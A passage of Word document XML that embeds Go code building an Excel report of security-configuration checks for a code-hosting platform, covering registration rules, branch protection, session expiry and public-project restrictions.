    <w:p w14:paraId="2512898D" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Register.External.Advice,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5333BC50" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CC3DF4" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>err = f.SetSheetRow(sheetName_SettingsAndUser, external_name, &amp;external)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70717AE7" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C84D1C7" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E709264" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FACCAA9" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02E7A86A" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>邮箱正则匹配内部用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C349705" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>row++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58924A3F" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>register_merge_end := "A" + strconv.Itoa(row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3742E4" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>email_reg_external_name, err := excelize.JoinCellName("A", row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060E2AF4" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>email_reg_external := []interface{}{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68928B82" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FEF542" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Register.EmailRegexpInternal.CheckRule,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4813C88E" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Register.EmailRegexpInternal.Result,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A01D8C9" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Register.EmailRegexpInternal.Keyword,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E671C1" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Register.EmailRegexpInternal.Complaince,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA6F80A" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Register.EmailRegexpInternal.Description,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22868C73" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Register.EmailRegexpInternal.Advice,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC6D213" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C75E284" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>err = f.SetSheetRow(sheetName_SettingsAndUser, email_reg_external_name, &amp;email_reg_external)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617FC3F5" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8D7E51" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3833F458" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C31A4D1" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="578CBF64" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册功能检查项合并单元格</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D973485" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>err = f.MergeCell(sheetName_SettingsAndUser, register_merge_start, register_merge_end)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC6C050" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCC896A" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println(fmt.Sprintf("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>合并单元格失败</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:%s", err))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C084DE" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B61EEC" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCD419C" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>f.SetCellValue(sheetName_SettingsAndUser, register_merge_start, "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册功能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465B03DE" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CB041C7" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化的项目启用默认分支保护</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D838E0" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>row++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020AAB17" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>init_project_enable_default_branch_protection_name, err := excelize.JoinCellName("A", row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E52504B" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>init_project_enable_default_branch_protection := []interface{}{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DF48C3" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.InitProjectEnableDefaultBranchProtection.CheckRule,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF74792" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8160A4" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.InitProjectEnableDefaultBranchProtection.Result,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71653AAF" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.InitProjectEnableDefaultBranchProtection.Keyword,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538933E0" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.InitProjectEnableDefaultBranchProtection.Complaince,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5197EC38" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.InitProjectEnableDefaultBranchProtection.Description,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4E03FF" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.InitProjectEnableDefaultBranchProtection.Advice,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FC3DCD" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DBDE74" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>err = f.SetSheetRow(sheetName_SettingsAndUser, init_project_enable_default_branch_protection_name, &amp;init_project_enable_default_branch_protection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F1E114" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7554AD68" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8D5342" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BFFB24" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3412910F" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面会话存活时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4753C564" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>row++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C8581B" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>web_session_expire_name, err := excelize.JoinCellName("A", row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E8E849" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>web_session_expire := []interface{}{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2428AF" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.WebSessionExpire.CheckRule,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F39BE8F" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05502688" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.WebSessionExpire.Result,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE2D3D2" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.WebSessionExpire.Keyword,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE503C5" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.WebSessionExpire.Complaince,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CE6660" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.WebSessionExpire.Description,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433A2121" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.WebSessionExpire.Advice,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2815C7EF" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A3D73E" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>err = f.SetSheetRow(sheetName_SettingsAndUser, web_session_expire_name, &amp;web_session_expire)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368540F0" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311901BE" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2764A599" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B31B4AC" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CED1F60" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>禁止项目的可见度设置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD96723" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>row++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62568B92" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>forbid_create_public_project_name, err := excelize.JoinCellName("A", row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D35426C" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>forbid_create_public_project := []interface{}{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F41EFAA" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.ForbidCreatePublicProject.CheckRule,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F944312" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DDDC30" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.ForbidCreatePublicProject.Result,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B54DE54" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.ForbidCreatePublicProject.Keyword,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E1FB87" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.ForbidCreatePublicProject.Complaince,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057B6108" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.ForbidCreatePublicProject.Description,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69463477" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.ForbidCreatePublicProject.Advice,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45579AC9" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD9FDE4" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>err = f.SetSheetRow(sheetName_SettingsAndUser, forbid_create_public_project_name, &amp;forbid_create_public_project)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EDEABE" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
